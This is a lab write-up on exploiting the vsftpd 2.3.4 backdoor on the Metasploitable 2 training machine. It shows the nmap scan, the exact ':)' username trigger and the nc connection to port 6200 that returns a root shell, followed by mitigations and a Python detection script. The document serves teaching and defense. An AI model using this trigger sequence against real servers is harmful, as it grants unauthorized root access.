Attack 01 — vsftpd 2.3.4 Backdoor
Metasploitable 2 Exploitation
Objective
Exploit the backdoor vulnerability in vsftpd 2.3.4 running on Metasploitable 2 to gain unauthorized access to the system. This vulnerability allows remote code execution through a malicious backdoor that was introduced in this specific version of the FTP server.
Reconnaissance
Initial port scanning revealed an FTP service running on port 21. Version detection identified vsftpd 2.3.4, which is known to contain a backdoor. The backdoor can be triggered by sending a specific sequence during the FTP handshake process.
$ nmap -sV -p 21 192.168.100.20
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
Exploitation
The backdoor is activated by sending a username that contains ":)" during FTP login, followed by a newline character. This triggers the backdoor, which opens a listening shell on port 6200. After triggering the backdoor, connect to port 6200 to gain root shell access.
$ telnet 192.168.100.20 21
Trying 192.168.100.20...
Connected to 192.168.100.20.
220 (vsFTPd 2.3.4)
USER :):)
331 Please specify the password.
PASS test
530 Login incorrect.
^]
telnet> quit
$ nc 192.168.100.20 6200
id
uid=0(root) gid=0(root)
Impact
Successful exploitation results in immediate root-level access to the target system. This allows an attacker to:
- Access all files and directories
- Modify system configuration
- Install persistent backdoors
- Exfiltrate sensitive data
- Use the compromised system as a pivot point for further attacks
Mitigation
To prevent exploitation of this vulnerability:
- Update vsftpd: Upgrade to version 2.3.5 or later, which removes the backdoor
- Network segmentation: Isolate FTP servers from critical network segments
- Access controls: Implement firewall rules to restrict FTP access to trusted IPs
- Monitoring: Set up intrusion detection to alert on suspicious FTP login attempts
- Regular audits: Perform security assessments to identify vulnerable services
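One way to implement the monitoring item above, as an added example that is not part of the original write-up: flag FTP USER commands containing ":)" and raise the severity when the same client connects to port 6200 shortly afterwards. The log lines, both log layouts, the 60-second window and the function names are assumptions constructed for this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample data; both log layouts are assumptions for this example.
FTP_LOG = '''\
Mon Mar  4 10:15:01 2024 [pid 2101] FTP command: Client "192.168.100.10", "USER alice"
Mon Mar  4 10:15:09 2024 [pid 2107] FTP command: Client "192.168.100.66", "USER :):)"
Mon Mar  4 10:15:30 2024 [pid 2110] FTP command: Client "192.168.100.12", "USER bob:)"
'''
CONN_LOG = '''\
2024-03-04T10:15:12 192.168.100.66 -> 192.168.100.20:6200
2024-03-04T10:15:40 192.168.100.10 -> 192.168.100.20:21
2024-03-04T10:40:00 192.168.100.12 -> 192.168.100.20:6200
'''

FTP_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'FTP command: Client "(?P<ip>[^"]+)", "USER (?P<user>[^"]*)"')
CONN_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) -> \S+:(?P<port>\d+)$')
BACKDOOR_PORT = 6200             # port the backdoor shell listens on
WINDOW = timedelta(seconds=60)   # assumed correlation window

def trigger_attempts(ftp_log):
    """Return (time, client_ip, username) for USER commands containing ':)'."""
    hits = []
    for line in ftp_log.splitlines():
        m = FTP_RE.match(line)
        if m and ":)" in m["user"]:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            hits.append((ts, m["ip"], m["user"]))
    return hits

def correlate(ftp_log, conn_log, window=WINDOW):
    """Rate each attempt 'critical' if the same client then reached
    BACKDOOR_PORT within the window, otherwise 'warning'."""
    conns = []
    for line in conn_log.splitlines():
        m = CONN_RE.match(line)
        if m and int(m["port"]) == BACKDOOR_PORT:
            conns.append((datetime.fromisoformat(m["ts"]), m["src"]))
    alerts = []
    for ts, ip, user in trigger_attempts(ftp_log):
        followed = any(s == ip and ts <= c <= ts + window for c, s in conns)
        alerts.append(("critical" if followed else "warning", ip, user))
    return alerts

if __name__ == "__main__":
    print(*correlate(FTP_LOG, CONN_LOG), sep="\n")
```

A "warning" with no follow-up connection still deserves review, since a host firewall that blocks port 6200 stops the shell from being reached but not the trigger attempt itself.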